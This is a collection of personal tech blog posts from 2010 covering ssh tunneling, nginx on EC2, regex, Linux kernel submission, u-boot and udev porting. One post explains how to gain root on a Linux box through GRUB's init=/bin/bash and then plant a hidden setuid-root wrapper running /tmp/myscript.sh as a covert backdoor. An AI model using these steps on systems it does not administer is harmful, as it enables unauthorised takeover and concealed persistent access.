Tuesday, December 14, 2010

ssh tunneling is powerful

To work from home, we have to use an "svi" service with a dynamically changing password, and ssh to a dedicated company server. It was a bit inconvenient at the beginning, until I found the power of ssh tunneling.


In short, if you have an ssh connection, you can set up LocalForward entries, and then your ssh server works like a proxy into the other network.


As we have a proxy server for access to the company intranet, I can set up a local proxy script that uses the proxy when I need to access the intranet, and no proxy for the rest of the internet.


For example, here is my .ssh/config file:

Host svi0
HostName svi_server_name
User your_user_id

LocalForward 2001 internal_host_1:22
LocalForward 2002 internal_host_2:22

Host svi1
HostName localhost
Port 2001
User your_user_id
LocalForward 3128 proxy_server:3128

Host svi2
HostName localhost
Port 2001
User your_user_id

Host svi3
HostName localhost
Port 2002
User your_user_id



Then you can just run "ssh -f -N svi0" and the tunnel is established.


Then "ssh svi1", you may login to internal_host_1 using your own password, instead of the one-time password.



The proxy auto-config script, myproxy.pac, is below; you need to point your browser at it manually. Note that the 3128 forward is defined on svi1, so keep "ssh -f -N svi1" running for the proxy to work.

function FindProxyForURL(url, host) {
   if (isPlainHostName(host) ||
       dnsDomainIs(host, "intranet_domain1") ||
       dnsDomainIs(host, "intranet_domain2") ||
       isInNet(host, "intranet_ip_addr", "255.255.255.255")) {
      return "PROXY localhost:3128";
   } else {
      return "DIRECT";
   }
}


With this setup, I have a Linux working environment at home that is very similar to the one I have at the company.

Sunday, December 12, 2010

web hosting with nginx and Amazon EC2

I have been doing some tests recently on using Amazon's EC2 for website hosting. EC2 is a cloud service offered by Amazon: you get total control, i.e., root access, over a virtual server hosted by Amazon. Their current promotion gives you free use for the first year, which is why I decided to do a trial. Even after the first year, if you buy a reserved instance from Amazon, it is not expensive compared to the virtual dedicated server plans offered by companies such as GoDaddy.

I am also using nginx as my web server. It is a very powerful and fast web server, faster and simpler than Apache, and I use FastCGI to handle my PHP scripts. Right now, all my websites are hosted on a new virtual dedicated server from GoDaddy, using nginx. I haven't tested Perl support yet.
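
nginx does not run PHP itself; it needs a FastCGI backend listening on a port such as 127.0.0.1:9000, which the config below assumes. One common way to start such a backend is spawn-fcgi (a sketch; the php-cgi path and child count are assumptions, not necessarily my exact setup):

# keep 4 php-cgi children answering FastCGI requests on port 9000
spawn-fcgi -a 127.0.0.1 -p 9000 -C 4 -f /usr/bin/php-cgi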

Most of my websites use the WordPress framework. I've learned the basic configuration using "try_files" to replace the rewrite rules required by WordPress.

The following is an example of my configuration for a virtual host.

server {
    listen       80;
    server_name  example.com;

    error_log /var/log/nginx/example.error.log error;
    access_log  /var/log/nginx/example.access.log  main;

    root   /var/www/example;
    index  index.php;
    try_files $uri $uri/ /index.php;

    location ~ \.php$ {
        include        /etc/nginx/fastcgi.conf;
        fastcgi_pass   127.0.0.1:9000;
    }
}

Tuesday, November 09, 2010

procmail, Catalyst, and DBIx

Stuff I have been working on recently.

Procmail

I learned to use procmail to filter my emails and wrote some rules for it. My recent activity was to create a Perl script that performs a special action once an email is received. This can be very helpful for building a trigger system for our infrastructure.

A great glue for various tools.
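
For example, a recipe like the following pipes matching mail into a script (a sketch; the subject tag and script path are made up):

# run the trigger script for every mail whose subject carries the tag
:0
* ^Subject:.*\[trigger\]
| $HOME/bin/handle_trigger.pl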

Catalyst

I am learning Catalyst, the MVC-based Perl web framework. It is powerful, but the initial learning curve can be steep. Anyway, I've learned to use the schema and resultsets to generate customized queries.

DBIx

I learned DBIx::Class while I was learning Catalyst, but I now use it in my other scripts too, to share the same schema created for the database. It is a new way of working with databases, and I like it.
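
A minimal sketch of the kind of query I mean, assuming a typical DBIx::Class schema class MyApp::Schema with a User result class (all names are illustrative):

#!/usr/bin/perl
use strict;
use warnings;
use MyApp::Schema;

my $schema = MyApp::Schema->connect('dbi:SQLite:myapp.db');

# search() builds the SQL lazily; rows/order_by become LIMIT/ORDER BY
my $users = $schema->resultset('User')->search(
    { active => 1 },
    { order_by => { -desc => 'created' }, rows => 10 },
);
print $_->name, "\n" for $users->all;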

Misc

Some cool tools I have been using recently:
* ack: a great alternative to "grep".
* pv: displays progress of data through a pipe (see the example below).
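
For example, pv drops into a pipe to show throughput and progress (a typical use, not from my notes):

pv big_backup.tar.gz | tar xzf -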

Friday, October 22, 2010

regex

I had an interesting regular expression problem this week.

The problem we are trying to solve is simple: find the root directory of a software repository.

The assumption is that every repository contains a directory named "foo" or "bbb". So, given a full path, we need to find the parent directory of "foo" or "bbb". For example, given the directory "/home/myhome/test/foo/dir1/deb", we should return "/home/myhome/test" as the root directory of the repository. Another example: "/home/myhome/ttt/bbb/test" should return "/home/myhome/ttt".

Our original regexes to match the root directory were pretty simple:

/(.*)\/foo/

/(.*)\/bbb/

We match the input twice: against the first pattern first, and then the second.

However, we got an error in a case like "/home/myhome/football/bbb": it returns "/home/myhome" instead of "/home/myhome/football", because the first pattern happily matches the "foo" inside "football".

Then I tried /(.*)\/foo\// to match the path. This new one works for the above test cases, but fails when the input is "/home/myhome/football/foo", since there is no slash after the final "foo".

My final solution is simple: just append a "/" to the end of the input and use /(.*)\/foo\// to match the path. Afterwards, just remove the trailing "/" that was appended.
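
Here is a small sketch of the whole trick in Perl (the helper name and test paths are mine, not the original script):

#!/usr/bin/perl
use strict;
use warnings;

sub repo_root {
    my ($path) = @_;
    # append "/" so the marker directory always ends in a slash;
    # working on a copy means there is no trailing "/" to remove later
    my $probe = $path . "/";
    for my $marker (qw(foo bbb)) {
        return $1 if $probe =~ m{(.*)/$marker/};
    }
    return;    # no marker directory found
}

print repo_root("/home/myhome/test/foo/dir1/deb"), "\n";  # /home/myhome/test
print repo_root("/home/myhome/football/bbb"), "\n";       # /home/myhome/football
print repo_root("/home/myhome/football/foo"), "\n";       # /home/myhome/football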

The solution itself is not hard, but it took me some time to come up with it, as I didn't think of changing the input a little to make the match work. I could have used more conditional statements to check the input, but the final regex is simpler and more beautiful.

Sometimes you just have to jump outside the usual solution. The beauty and simplicity of the code should be our goal.

Wednesday, September 22, 2010

Linux Kernel Submission

I think it is time to summarize my experience submitting the bcmring architecture into the Linux kernel.

You may find my contribution to kernel 2.6.32 on the following page. Note that Broadcom ranked No. 4 by lines changed, mostly by me. :-)
Linux Kernel Development Statistics

1) subscribe to the linux-arm-kernel mailing list
2) send out your first email asking about other people's attitude toward submitting a driver/architecture
3) prepare your own git tree; it's better to start with the latest tree
4) port your core code into the git tree; include only the core code and a minimal set of drivers to start, like core, dma, serial
5) change the kernel Makefile and Kconfig files to support your architecture
6) prepare an arch_defconfig configuration file; this is used to regression-test the build of your architecture
7) split your patches into small chunks
8) run Lindent (and scripts/checkpatch.pl) and make sure there are no errors or warnings; a lot of kernel developers are picky, so be prepared to reformat your code and rename variables as much as needed
9) try a submission, with detailed explanations and commit messages (see the sketch after this list)
10) be patient
11) get feedback and prepare another set of submissions
12) ask for feedback once a week and push to get feedback, until nobody complains about your code
13) repeat until your code is merged
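
For step 9, the usual mechanics are git format-patch and git send-email (standard git commands; the list address shown is the current linux-arm-kernel one and is an assumption on my part):

# one patch file per commit, plus a cover letter for the series
git format-patch --cover-letter origin/master

# mail the series to the list for review
git send-email --to linux-arm-kernel@lists.infradead.org *.patch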

Thursday, September 02, 2010

badly punctuated parameter list

I encountered a strange problem, "badly punctuated parameter list", in a C macro definition when I was compiling Perl modules on the Solaris platform. After some research, I found that it is due to ancient gcc versions, like 2.8.1, which can't process the following macro definition.

#define my_snprintf(buffer, len, ...) snprintf(buffer, len, __VA_ARGS__)

You have to change it to a more compatible form like the following.

#define my_snprintf(buffer, len, ARGS...) snprintf(buffer, len, ##ARGS)
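
A quick way to verify the compatible form (a minimal test of my own, not from the original build):

#include <stdio.h>

/* GNU-style named variadic macro; ##ARGS also swallows the
   preceding comma when no extra arguments are passed */
#define my_snprintf(buffer, len, ARGS...) snprintf(buffer, len, ##ARGS)

int main(void)
{
    char buf[32];
    my_snprintf(buf, sizeof buf, "%s-%d", "test", 42);
    puts(buf);    /* prints "test-42" */
    return 0;
}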

Friday, July 16, 2010

hidden arguments, easter egg, or what?

I just learned today that there is a hidden argument to the 'date' command under Linux.

It is 'date --iso=seconds', which is equivalent to 'date +%FT%T%z' command.

The '--iso=seconds' argument is recorded in neither the manual nor the usage help. It is also not supported on Solaris. So, I fixed a script problem today by replacing the non-standard --iso=seconds argument with the +%FT%T%z argument for date.
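
Both forms produce an ISO 8601 timestamp; for example (illustrative output, and the exact offset formatting can vary between coreutils versions):

$ date --iso=seconds
2010-07-16T10:05:00-0700
$ date +%FT%T%z
2010-07-16T10:05:00-0700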

I found another hidden argument, of the 'cov-maintain-db' command in Coverity Prevent 4.5. You may use 'cov-maintain-db --raw-db' to open an 'sqlite' shell on the Coverity database. However, AFAIK, Coverity is moving to a PostgreSQL database in their latest release, so this hidden argument will become useless.

In my 10 years of experience in the computing industry, it's funny to find that there are actually so many undocumented commands, arguments, and APIs everywhere. They are the easter eggs and tricks of the IT industry. The practice is so universal, and it seems every person and every company is fond of doing it, as a demonstration of their power over end users. :-)

That's why I like open source software. You may dig into the source code to uncover all the hidden or unofficial stuff.


Friday, June 25, 2010

coverity

I have recently been working with the Coverity Prevent product, a static source code analysis tool that identifies possible bugs in source code. The tool is pretty cool; it was originally developed at Stanford University, and it has gained a lot of momentum recently, with mature products and VC backing. It looks like many big companies are jumping on board with Coverity. It's a promising tool, but I think the final fate of the company, or its best deal, would be to be acquired by a big software company like Microsoft or Symantec. Anyway, it's a good tool, and I am its administrator in my department at Ericsson Canada.



Friday, June 18, 2010

How to hack the Linux box to get root permission

You have a Linux box, but only a normal user account, and you want to hack the box and get root permission. Now you have a solution.

Note: the following procedure works only when you use the GRUB boot loader. I have never tested it with LILO.

1. reboot your machine
2. before it boots into Linux, press a key to bring up the boot loader interface
3. press "e" to edit the boot line in GRUB
4. add "init=/bin/bash" or "init=/bin/sh" to the end of the kernel line
5. press Enter and then press "b" to boot
6. the system boots and you are root, without logging in
7. Bingo. You can hijack the system now. :-)
8. To be a good citizen, I would recommend adding your own user id to the /etc/sudoers file, using the "visudo" command. Then you can "sudo bash" to get a shell with root permission. You still don't know the root password, but you have root permission. This way, though, the real root will know it was you who hacked the system, by checking the "/etc/sudoers" file.
9. To do something more secret, you can create a suid program that executes your script as root.

I have a C program for that; you may build it and set the suid bit.

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
   /* become root; this only succeeds when the binary is owned by
      root and has the suid bit set */
   if (setuid(0) != 0) {
      perror("setuid");
      return 1;
   }
   system("/tmp/myscript.sh");

   return 0;
}

10. save the program as t.c
11. gcc -o go t.c
12. as root: chown root go, then chmod 4755 go (setuid(0) only works if the file is owned by root)

Now you can put anything you want in /tmp/myscript.sh and run go; /tmp/myscript.sh will be executed as root. Wow!

Don't do anything stupid that gets you into trouble. This is just a demonstration of a hacking technique on Linux systems.

Wednesday, May 19, 2010

mutt, fetchmail, procmail, and mini_sendmail

In recent days, I've managed to set up mutt, together with fetchmail, procmail, and mini_sendmail, in my working environment.

Mutt is my favorite MUA (mail user agent), due to its simplicity, speed, and powerful configuration.
Fetchmail grabs mail from the POP/IMAP server and delivers it to a local directory.
Procmail classifies the received mail, based on very flexible regex rules and actions, which are script-able.
mini_sendmail serves as the MTA that contacts the SMTP server, sending mutt's outgoing mail if your system's sendmail is not configured as a smart host.

The setup of my environment is outlined below.

Fetchmail's configuration for IMAP server
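
A minimal sketch of a ~/.fetchmailrc for an IMAP server (server name, user, and paths are placeholders, not my real config):

poll imap.example.com
  protocol imap
  user "your_user_id" password "secret"
  ssl
  mda "/usr/bin/procmail -d %T"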

Procmail's configuration
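
A minimal sketch of a ~/.procmailrc (folder names and the sample rule are placeholders):

MAILDIR=$HOME/Mail
DEFAULT=$MAILDIR/inbox/
LOGFILE=$MAILDIR/procmail.log

# deliver mailing-list mail to its own maildir folder
:0
* ^List-Id:.*mylist
mylist/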

Mutt configuration
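
A minimal sketch of the matching ~/.muttrc (the mini_sendmail server flag and the paths are assumptions):

set mbox_type=Maildir
set folder=~/Mail
set spoolfile=+inbox
set sendmail="/usr/bin/mini_sendmail -s smtp.example.com"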

Saturday, April 24, 2010

Wordpress vs. Drupal

I recently installed WordPress and Drupal on my two websites:
WordPress on http://alrishachen.com
Drupal on http://alrisha.ca

I'll compare these two popular CMSes based on my own experience.

* installation. Both are easy to install and deploy on your hosting server. You just untar the tarball and set up the database, usually MySQL, following the documentation. Then you run the install page, input the necessary data, and you are done! I'd say WordPress is easier than Drupal: its installation is faster, with less to worry about.

* administration. Once you have installed the system, you log in as the administrator to configure your website and add content. As WordPress is generally regarded as a blog system, I used it for a blog. The default administration interface of WordPress is both easy and powerful. Drupal targets more generic websites, so its administration is more complicated, with a lot of settings; it can be intimidating for a small website admin to learn. But I can see that Drupal provides more control, especially role-based user permission management. On this point, I would say they are even, although the WordPress interface is more intuitive for beginners.

* theme. WordPress is the winner in terms of themes. There are a lot of themes provided by the community, the previews look good, and the themes are easy to apply. On the other hand, the themes provided by Drupal seem to give designers more control over the layout and blocks of the website. For an admin like me, without much design background, I love the beautiful themes in WordPress.

* module/plugin. Both have a huge number of modules/plugins available. Plugins for WordPress are easy to install from the admin interface, although the auto-installer only works with FTP access to the server.

* overall. I'd love to use WordPress for small websites, especially blog-style ones. Drupal seems more flexible to configure and provides more control. If you spend a lot of time on website design and are willing to learn Drupal, choose Drupal. If you just need a quick website set up for a certain purpose, I'd recommend WordPress.

Anyway, this comparison is based on my limited experience with these two CMSes and on personal preference. I may form different opinions later, with more use and more requirements. I'd also like to try other popular CMSes, such as Joomla. More reviews may come later.

Tuesday, March 16, 2010

linking with multiple definition of functions

I fixed a linking problem today. It was caused by multiple definitions of the same function name, which the linker complains about. The solution is to add "-z muldefs" to the LDFLAGS, so that the linker accepts multiple definitions and links in only the first definition it encounters for each function.

This can be dangerous: the final image may differ if the link order of the object files changes, so be careful with this option. We used it because we have defined some of our own stdio functions with the same names as the standard stdio functions, which produces multiple-definition errors at the linking stage. We just need to place our own implementation of the stdio functions ahead of the newlib stdio library on the link line.
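
In practice the link line looks something like this (a sketch; file names are placeholders, and the flag spelling assumes a GNU-compatible linker):

# our stdio objects come before the library, so their definitions win
gcc -o image.elf my_stdio.o main.o -Wl,-z,muldefs -lc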

A better solution would be to rename our functions to names other than the stdio function names; that way, there is no further confusion.

I eventually realized that I had fixed this same problem on the bcmring platform a year ago, and now I had to fix it again for the bcmhana platform. The engineer who ported the makefile to bcmhana didn't pay enough attention to this option.

Sunday, March 07, 2010

u-boot works now

I finally got u-boot working on our bcmring platform on Friday. On Thursday I had a hunch that the ATAG parameters were not set properly, so the kernel couldn't boot. I used JTAG to examine the memory where the ATAG parameters are stored. By comparing the memory content set by the working boot2 loader with that set by u-boot, I found that the kernel command line wasn't being set at all in u-boot. It turned out to be an error in the configuration header files. After setting the proper kernel command line, I could finally boot the kernel with u-boot. That's big progress: I made u-boot work in two weeks.

In doing this project, I gained a better understanding of the kernel boot procedure, the ATAG parameters, and u-boot itself. After discussing with my lead, the upcoming u-boot work includes:

* deliver the changes into linux-c for u-boot support, with proper parameters and configurations.
* upgrade u-boot to the latest version and get it working on the bcmring platform.
* port the Ethernet driver to u-boot, so that network boot and a network rootfs are supported.
* if time permits, get u-boot or another bootloader working for bcmhana as well.

Thursday, March 04, 2010

u-boot again

I am still working on the u-boot project. After I got the ARM RealView ICE debugger, my life became easier, but it is still tough. I traced the assembly code of the Linux kernel and compared the execution of the same kernel booted by boot2 and by u-boot. As boot2 can successfully boot the kernel image, I just need to make sure u-boot gets the kernel to the same state that boot2 creates for it.

Today I figured out, by checking the kernel parameters, that the memory starting address was not set to the proper value in u-boot. However, after I modified the u-boot code, I still can't get past the same point in the kernel image. Anyway, there is a problem to be fixed; I'll keep working on it tomorrow, by checking the memory set up by boot2/u-boot before the kernel boots.

The Linux kernel needs some settings passed in ATAGs. These are read by the kernel during the boot stage. There are several ATAG parameters: the memory starting address and size, the command line, etc. (the arch/machine id itself goes in register r1, alongside the pointer to the ATAG list in r2).
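
For reference, the tag list is a chain of small structures in memory. A sketch of the layout (constants from the ARM boot convention, not the actual bcmring code):

/* each tag is a header followed by a tag-specific payload */
#define ATAG_CORE    0x54410001   /* starts the list */
#define ATAG_MEM     0x54410002   /* memory start address and size */
#define ATAG_CMDLINE 0x54410009   /* kernel command line string */
#define ATAG_NONE    0x00000000   /* ends the list */

struct atag_header {
    unsigned int size;   /* size in 32-bit words, including this header */
    unsigned int tag;    /* one of the ATAG_* values above */
};

struct atag_mem {
    unsigned int size;   /* memory size in bytes */
    unsigned int start;  /* physical start address */
};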

Wednesday, February 24, 2010

u-boot

I have been working on u-boot since last week; I need to port it to our bcmring platform.

We have an example from another Broadcom team that supports u-boot on the 2153 platform, which has an ARM core similar to our bcmring's.

I got u-boot to build last week. This week, I learned to use JTAG to load the u-boot ELF file into the platform's memory after DDR initialization. I ported the UART driver and then the timer driver, and yesterday I was able to boot to the u-boot shell over JTAG. That's a good milestone.

Today, I studied our first-stage boot loader (boot1) and the relation between boot1 and boot2, the second-stage boot loader. Since I am trying to replace boot2 with u-boot, once I had figured out the memory map of boot2, with the help of Darwin, I managed to load u-boot from boot1 and boot to the u-boot shell without using JTAG. That's a big success. I can now work on the NAND driver to get u-boot to boot our kernel.

The Ethernet driver and SD/MMC support will follow the NAND driver.

Wednesday, January 13, 2010

udev 150

I've successfully updated udev on our target from version 142 to version 150. I added three patches to fix compile errors. Those patches are needed because the kernel headers in our toolchain are older than the latest version; for example, the inotify_init1 system call is not available in our toolchain, so I had to use inotify_init instead.
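
The fallback follows the usual compatibility pattern (a sketch of the idea, not the actual patch; using IN_CLOEXEC as the feature test is an assumption):

#include <sys/inotify.h>
#include <fcntl.h>

static int compat_inotify_init(void)
{
#ifdef IN_CLOEXEC
        /* new enough headers: one call sets close-on-exec atomically */
        return inotify_init1(IN_CLOEXEC);
#else
        /* old headers: plain init, then set the flag separately */
        int fd = inotify_init();
        if (fd >= 0)
                fcntl(fd, F_SETFD, FD_CLOEXEC);
        return fd;
#endif
}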

Anyway, it worked on my first attempt. The old 142 version was ported by an intern, with too many modifications to the makefiles and configure scripts; those patches were 90% junk, I would say. The newer version is much more maintainable now.

Tuesday, January 12, 2010

udev

I've got udev working on our platform. It's initially ported by an intern, but it seemed not working before he left. The problem was due to the kernel configuration. Once I sorted out the proper kernel configuration, udevd started properly and it works. The ota also worked with the udev. The previous port of udev was udev 142 version, which is rather old. I am porting the 150 version to our system.